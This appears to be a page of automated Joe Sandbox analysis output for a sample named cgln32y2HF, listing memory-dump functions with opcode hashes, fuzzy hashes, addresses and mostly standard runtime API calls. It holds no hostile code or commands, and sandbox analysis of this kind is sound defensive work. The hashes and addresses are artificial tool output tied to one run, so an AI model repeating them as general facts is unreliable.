                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
                                                          • Instruction ID: 7aad21176e94204ebf9be3326ef5f875fb6c76e3886be83ba2785e1930059451
                                                          • Opcode Fuzzy Hash: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
                                                          • Instruction Fuzzy Hash: CED1D1716083154FD30CCF5DC89532AFBE5ABC8710F4A892EE999DB3A1D6B8DC058B85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
                                                          • Instruction ID: 05fb3061c803852ccbcb55ec79df352ea4c9045d55e38e7908647069224f19b4
                                                          • Opcode Fuzzy Hash: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
                                                          • Instruction Fuzzy Hash: DAC1AF30A006468EFB24CF58C480AABB7B2BB09304F14465FD956D7BB1D778ADC6CB59
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
                                                          • Instruction ID: 86255bcc3f122f9cb2bdcdd6b3c86e7cac227984b0ae32171133bf816eefb62b
                                                          • Opcode Fuzzy Hash: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
                                                          • Instruction Fuzzy Hash: 0EC1EE70A006469FEB28CF28C69066FBBB1EF05304F94461FF85697391C7B8AD46CB59
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
                                                          • Instruction ID: be4b2c5f41c1c6b016d0662a1a3aa3dff1cc49737e4a0fee46609b29334a7491
                                                          • Opcode Fuzzy Hash: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
                                                          • Instruction Fuzzy Hash: C3C18E716087518BC728CF1CC4903AEB7E2AFC4310F19CA2EE999D7795D7789881CB96
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                          • Instruction ID: ecdb7d8b3c128cef4b5a8eef640ce4e1348b954c5e1c8cc4e6b72fcb2b8dd03a
                                                          • Opcode Fuzzy Hash: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                          • Instruction Fuzzy Hash: 07C18F70608386AFC714CF28C84469ABFA1BF65304F04865EF8994B782D774DA68CB96
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
                                                          • Instruction ID: 33946987a401538ec29d146c49bd0777ead14b37c14ca5df7bbf2076656dae12
                                                          • Opcode Fuzzy Hash: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
                                                          • Instruction Fuzzy Hash: FB9116327041214FD35CDB3D8D66529FBE6ABC9244F49CA3EE08ACB292E974DA13C751
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
                                                          • Instruction ID: 2f1fa1f2c0ce5c767d39326a4a7df2626eefc8e715aa17eb357957d79dd35fa3
                                                          • Opcode Fuzzy Hash: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
                                                          • Instruction Fuzzy Hash: 7A8171716087518BC728CF2DC8906AEFBE2AFC4310F19CA2EE8D9D7795D6349881CB55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
                                                          • Instruction ID: 7f6a3678a30058b370d0d799ec085ce4703b2b826dd53e06f65c8239fe1aa67b
                                                          • Opcode Fuzzy Hash: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
                                                          • Instruction Fuzzy Hash: FE516E71E00119AFEF04CF99C941AAFBBB2FF88304F19849DE815AB201C7749E51DB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                          • Instruction ID: de9ed496828060945def11e817e7598d09d079133ac2fb2d8aa5c02de47949ab
                                                          • Opcode Fuzzy Hash: 768c1d889d3b0b4dd139f02215e342ea367a32b8572c76f95433df72e755d40e
                                                          • Instruction Fuzzy Hash: C551CE317080610FD39CE63D8967439BAE69BC9144B49CA7EE0DBCB692E875CA23C751
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                          • Instruction ID: 0a1bca97f873a7a6d6a3aaff04d58e0ae48002bfba7cab88bc6042a4b6745ab0
                                                          • Opcode Fuzzy Hash: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                          • Instruction Fuzzy Hash: F841F2726013149FD320DF15DC80B26B7E4FF84718F16452AED4587725E778F850CA99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: affec256aca3101603e5e9c8b6c14aac85f880b69ce3fa9b32540f72830965cb
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: 62113BF7A0104243D7058A2DF9B47B7D395EFCE320F2C626BD0514B758D12AE9459608
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: b9abfda41b353c0c1e3259c952a9147802510d6a115bd1598094fb39f66939d6
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: 1711EBB734118B47D6148A3DD4BC6BAA79DEBC7129B2DC37AD0428F75CD3229144D604
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                          • Instruction ID: c3a51ff81cd43cadc2f91b9d343c289a0ae24623370d929bafb0354b6f338a0e
                                                          • Opcode Fuzzy Hash: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                          • Instruction Fuzzy Hash: F61194B66002147FE3006F69DC85E27BADCEB44354F45817AFD089B212D639ED14C6A5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                          • Instruction ID: af7ec3d076cba136a0faee5a26742be77a46195bb570506c981dbde19bbbb0ba
                                                          • Opcode Fuzzy Hash: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                          • Instruction Fuzzy Hash: 5411A0B2600248AFE314AF69CC84E27FAEDEB48254F058179FD0D9B222D635ED148A61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                          • Instruction ID: 775a38982ecc14386774c10a2ff7988f4febef0241ab9f2fac4c7ed0a075f983
                                                          • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                          • Instruction Fuzzy Hash: 5F21AF71A002268FCB24CF58C890B6BB7B1FF86708F69865DC8066B342D775EC42CB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmp, Offset: 00799000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_799000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                          • Instruction ID: 6d0fb59eaa6c8488612d0addeb0e3f1a1494ee6041c56ba44ffa74b45c362723
                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                          • Instruction Fuzzy Hash: 041182723401019FEB44DF59EC81FA673EAEB88360B298059EE08CB316E679EC41C760
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                          • Instruction ID: 5cf5f964e5d4fdf4ab25e9de6bfd162346dccf7c83c49c61d1a40ba7c9897cbe
                                                          • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                          • Instruction Fuzzy Hash: 36118A77A1827107D711CE759CE021AF7629BC622270F4376D981AB352C170EC5892D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                          • Instruction ID: 5e6f75d6069618f27f4e8ece13d34dcb27fa1cb4973037488a19f9399b438bca
                                                          • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                          • Instruction Fuzzy Hash: 04E01A75A116849FD7018F25E994B007BA1E704B10F458066F800D7A79F3B86C80CF8E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                          • Instruction ID: 2572daf3ac28ea9ece149f63ca22f641f49709f61c5ee85f622209572a58cfb2
                                                          • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                          • Instruction Fuzzy Hash: 33D08C31365650AFCB41DB48DD42F00B3E0EB48B32F258282B830AB2F2C724FE41CA05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                          • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                          • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                          • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                          APIs
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00459ABE
                                                          • CatchIt.LIBVCRUNTIME ref: 00459C1D
                                                          • _UnwindNestedFrames.LIBCMT ref: 00459D1E
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00459D39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm$x@F
                                                          • API String ID: 2332921423-3829711656
                                                          • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                          • Instruction ID: 2a8b5e3cbe88d0ad45d83a49b6c8541956edddbcc5d33c7cd0fd48112d7d16c1
                                                          • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                          • Instruction Fuzzy Hash: F9B16771800249EBCF19DFA5C8819AEB7B5FF04316F18415AEC116B213D338EE59CBA9
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045C0FF), ref: 0045C7AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                          • Instruction ID: 82d02ba150d8eb4d5d6beeccfbe315dd90ac4e528bf330bfbd80dbdd17a07d9b
                                                          • Opcode Fuzzy Hash: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                          • Instruction Fuzzy Hash: 585170B0900B0ADFCF149F69D8C81AEBBB0FB45316F14414BD881A6256DB788959CF5E
                                                          APIs
                                                            • Part of subcall function 00454B19: CreateFileW.KERNEL32(00000000,00000000,?,00454716,?,?,00000000,?,00454716,00000000,0000000C), ref: 00454B36
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,7595F770), ref: 00454781
                                                          • __dosmaperr.LIBCMT ref: 00454788
                                                          • GetFileType.KERNEL32(00000000), ref: 00454794
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,7595F770), ref: 0045479E
                                                          • __dosmaperr.LIBCMT ref: 004547A7
                                                          • CloseHandle.KERNEL32(00000000), ref: 004547C7
                                                          • CloseHandle.KERNEL32(00455523), ref: 00454914
                                                          • GetLastError.KERNEL32 ref: 00454946
                                                          • __dosmaperr.LIBCMT ref: 0045494D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID:
                                                          • API String ID: 4237864984-0
                                                          • Opcode ID: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                          • Instruction ID: 038922a14cfed84d654bc7e4756cd55dec8d6f56b9250bad4a8b086e30f44e5e
                                                          • Opcode Fuzzy Hash: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                          • Instruction Fuzzy Hash: C4A13731A041449FCF189F68DC91BAE3BA0EB87329F14015EFC019F392DB78885AC75A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %1.17g$[,]{: }$false$null$true
                                                          • API String ID: 4218353326-762322047
                                                          • Opcode ID: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                          • Instruction ID: 8a31c525fd10ccff58647d80abb421e7a2f49e00f52c285c36168c55111fec75
                                                          • Opcode Fuzzy Hash: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                          • Instruction Fuzzy Hash: E8B1E4F27043015BC701A9298C5062BA6DA9FD1318F19493FEF59E33C2FA7EDD16425A
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D7A7
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D7AF
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D838
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0043D863
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D8B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                          • Instruction ID: f027fe2574540ca3b1f88e77f7abec4aa80c90a537e94c27518ff210aad43bfc
                                                          • Opcode Fuzzy Hash: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                          • Instruction Fuzzy Hash: 0041EA34D012089BCF14EF69D881A9F7BB5FF48318F14816BE8249B352D739EA15CB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                          • Instruction ID: 20f6fc253ed9e18728f1e3e0f73237be974277a9ced04a575444c598e2f27323
                                                          • Opcode Fuzzy Hash: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                          • Instruction Fuzzy Hash: 05B1F574A04285AFDB15CF99C980BBE7BB1BF86305F14415BE80067393C7B89D4ACB69
                                                          APIs
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                          • __FindPESection.LIBCMT ref: 0044C6D1
                                                          • VirtualQuery.KERNEL32(83000000,58C6AD3B,0000001C,58C6AD3B,?,?,?), ref: 0044C7B6
                                                          • __FindPESection.LIBCMT ref: 0044C7F3
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                          • __FindPESection.LIBCMT ref: 0044C82D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                                          • String ID:
                                                          • API String ID: 2529200597-0
                                                          • Opcode ID: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                          • Instruction ID: e40285013e32dfb27aa5986082f3d9acaacd06ee7156ac865e10eba53592a1aa
                                                          • Opcode Fuzzy Hash: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                          • Instruction Fuzzy Hash: 71A1F375E022159BEB50CFA9D9C07BEB3A4EB49314F19412AD855E3361E739DC028FA8
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00432EBD
                                                            • Part of subcall function 00430E6C: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                            • Part of subcall function 00432718: CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 392924372-1067927601
                                                          • Opcode ID: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                          • Instruction ID: 62ef33d165420df4abe6194fc317c011647a9d43179361cb113ffb45af4e0bee
                                                          • Opcode Fuzzy Hash: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                          • Instruction Fuzzy Hash: 4AE12B71E006158BDF289E598D8657FB7B0AB0C314F24292BE511FA390D7BC9A418B8B
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0044C1F9,0043D4A6,0043CFF7), ref: 0044C210
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044C21E
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044C237
                                                          • SetLastError.KERNEL32(00000000,0044C1F9,0043D4A6,0043CFF7), ref: 0044C289
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                          • Instruction ID: c0e2f545b2bb83990020f58b3cafac4cb819fbf5ee5e5dfe57bf4abdb9a8f05a
                                                          • Opcode Fuzzy Hash: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                          • Instruction Fuzzy Hash: 5601F53260B6116EB69117B66CC656B2A88EF1137A328033FF920851F2FFD94C41919D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^F
                                                          • API String ID: 0-2072159057
                                                          • Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                          • Instruction ID: 9c600503ee011b5b01ea971114d00e1fe157cf1eb6220257661a77b4fb7b41e3
                                                          • Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                          • Instruction Fuzzy Hash: 7241C6B1600748AFDB35BF78CC45B6ABBAAEB84B10F10856AE511DF790D775E5408B80
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcsrchr
                                                          • String ID: .bat$.cmd$.com$.exe
                                                          • API String ID: 1752292252-4019086052
                                                          • Opcode ID: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                          • Instruction ID: b55bede8d45b761b400ac8ce0250aded4c8690036b953bdef2cda7eece1c3866
                                                          • Opcode Fuzzy Hash: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
